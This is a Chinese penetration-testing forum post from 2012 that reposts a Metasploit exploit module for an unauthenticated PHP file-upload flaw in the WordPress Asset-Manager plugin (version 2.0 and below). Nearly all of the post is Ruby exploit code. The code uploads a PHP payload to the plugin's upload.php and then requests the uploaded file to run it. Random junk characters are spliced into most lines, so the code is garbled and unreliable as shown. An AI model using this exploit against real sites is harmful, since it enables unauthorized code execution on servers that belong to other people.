找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2800|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
( r- Z: _: L5 }3 I, Y) p5 ~
% y5 R0 @2 B9 e& z! a, \5 w##* r- x( D: J9 A, k) T3 Y( l; {2 v1 ~
# This file is part of the Metasploit Framework and may be subject to& x) D; z% Z2 @; y$ D5 I; ?4 ]* i8 v
# redistribution and commercial restrictions. Please see the Metasploit
$ T- H% b( s) Q: C% ?# Framework web site for more information on licensing and terms of use.
0 ]6 |: h  H+ _+ h* @* T#   http://metasploit.com/framework/
1 S) w4 d* t9 D##0 |# P8 G4 c, ~% s: a5 `
  N, A5 R8 E" I# r
require 'msf/core'6 B, c3 d% g/ E( @9 H
require 'msf/core/exploit/php_exe'- O: N6 N* M8 q3 t8 D7 ^) Q
3 v6 u5 `+ P$ ~3 E: i
class Metasploit3 < Msf::Exploit::Remote
* e1 x) a) u" W: c7 L1 y1 l4 ]) k  Rank = ExcellentRanking6 Y- J: Y3 ?0 x1 v
- t8 I, l4 Y- a+ c# g
  include Msf::Exploit::Remote::HttpClient& S' u* k' A' }/ k
  include Msf::Exploit:hpEXE+ x7 }! L! A, Q
' O. a. [& f' L8 g) K9 d, _! V
  def initialize(info = {})- e' u) c$ N- ^$ ]' q  h8 g* s/ K
    super(update_info(info,
: t- R* y9 S1 s) }; f* a      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
, U5 p4 g3 |4 M8 c      'Description'    => %q{! u0 X5 B, K+ F/ `$ H/ d
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
5 Y% w* O/ ~9 m+ M8 V' w        plugin.  By abusing the upload.php file, a malicious user can upload a file to a( q+ z& B$ f2 M
        temp directory without authentication, which results in arbitrary code execution.& B7 G' R4 e( t: v1 X
      },
$ U" L! O9 G" S7 p# K0 K      'Author'         =>6 @) z9 \0 _, {/ H. x4 S9 S
        [. u/ W# ?3 }- [+ p! c
          'Sammy FORGIT', # initial discovery& e* ], L8 a! L% R9 ], Y
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
0 A* `( a7 }  m* s! V* I5 y        ],2 ?8 O( k/ K' H0 B3 D2 ^  S( f3 h
      'License'        => MSF_LICENSE,- L' E% ?. ?( o6 _3 {! j
      'References'     =>
/ ^! V' u3 k. \5 N        [
$ E* q4 f. y9 D          [ 'OSVDB', '82653' ],
: ?9 v+ s5 `, n) k; e" P* ~3 u          [ 'BID', '53809' ],
5 h+ V, e* L8 E% M( D          [ 'EDB', '18993' ],, ^) c4 h! i2 O! W
          [ 'URL', 'http:// www.myhack58.com /' ]* m9 @8 Z  F6 y) a2 B! p
        ],
: z3 Y. y( t3 g/ g# P6 z. L4 x      'Payload'       =>
1 M$ ?: B7 P. ^        {
2 U. o* s. v& u( ^+ q  R          'BadChars' => "\x00",
& z, W- d. g. I; Z* r, X  R        },
/ f. [2 K0 w9 z      'Platform'       => 'php',
# V9 J9 r, r4 `" p1 v. }4 ]6 P      'Arch'           => ARCH_PHP,3 f! P4 N; C2 h2 a% ?
      'Targets'        =>+ c. P" ?' U, g& O
        [
4 l5 I/ T9 ~* Y* \* {- @  d5 l5 G          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
  Z4 l+ ]9 D7 Z' Z          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
* R: u. a2 w$ k- z- I8 }        ],) P! Q) O) b$ G8 x  B
      'DefaultTarget' => 0,8 n* f& S& f7 K  ~' j
      'DisclosureDate' => 'May 26 2012'))- L/ @" D, ~+ J$ T) h/ y- Z
7 l/ w% T: o& V- D2 [
    register_options(
" y, l7 \* d0 l! m6 Q      [2 O- C6 ~$ R- E% B$ t; _% E  |" Z
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])! L2 d% b' |9 }8 o( a: l0 }7 N
      ], self.class)
# `, T' H/ R) m/ w- L0 u& t  end
$ H+ J) T$ I) b4 p" Y5 l   h' J( @% Y% ?* n7 M
  def exploit
+ v  n% t5 X( Q* Z- N    uri =  target_uri.path
, \* i7 h+ h5 O' C" u2 G( X- h1 F    uri << '/' if uri[-1,1] != '/'
* z! i: r/ `% o8 Y9 ^0 n    peer = "#{rhost}:#{rport}"
4 `9 t& M6 L3 n; Q    payload_name = "#{rand_text_alpha(5)}.php"5 Z# z5 P9 p8 b- _9 O
    php_payload = get_write_exec_payload(:unlink_self=>true)
6 v1 Q4 K$ G3 z ( r9 s# d- Q( L* C: ?
    data = Rex::MIME::Message.new
% i: M& n7 |# z% s3 [% ^4 G3 i6 A    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
' ~5 ?2 O' X  S% r2 @( @1 T    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
% D' T& _7 k. D% R ' i: C+ u1 V. L, W- m# j4 Z8 i
    print_status("#{peer} - Uploading payload #{payload_name}")9 F) b  `7 u" G, M/ A
    res = send_request_cgi({
5 D; ]; M  q  R# `+ Z4 i      'method'  => 'POST',
7 j% [$ `2 v' F" l" R6 S" x      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
$ U! x- L2 [" N1 Z      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
- j- ?. F6 j& T" D; N8 m      'data'    => post_data
* g: H: z( G' x    })
3 J5 y, I3 A: ^4 s: b
# X; ^/ x  F8 l/ q+ [8 z    if not res or res.code != 200 or res.body !~ /#{payload_name}/
1 j3 @3 I& X! X* A2 o8 l      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
1 s! q3 ?5 S8 Send
, j  z8 b8 `' V1 `4 S
  ~9 g% y. O9 W    print_status("#{peer} - Executing payload #{payload_name}")1 g( ^6 {! w' E
    res = send_request_raw({4 S: {( t, J5 c
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
  E; C" x9 e& J+ w) j      'method'  => 'GET', o% b, e. D+ ~: ]" F+ Y
    })
' s+ n  J! B0 Q; o
5 ]: A, E: L( U6 `    if res and res.code != 200" d& w6 p7 P' M1 j/ J' c) ~8 d
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% J: z1 p3 B" ~/ s5 [$ a& Z
    end' U. n$ e+ c! P4 c0 i& ]9 V5 i4 ^) P
  end% x7 X2 t! s) c5 E+ a
end* Z, P; a7 P" X1 c! P+ i
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表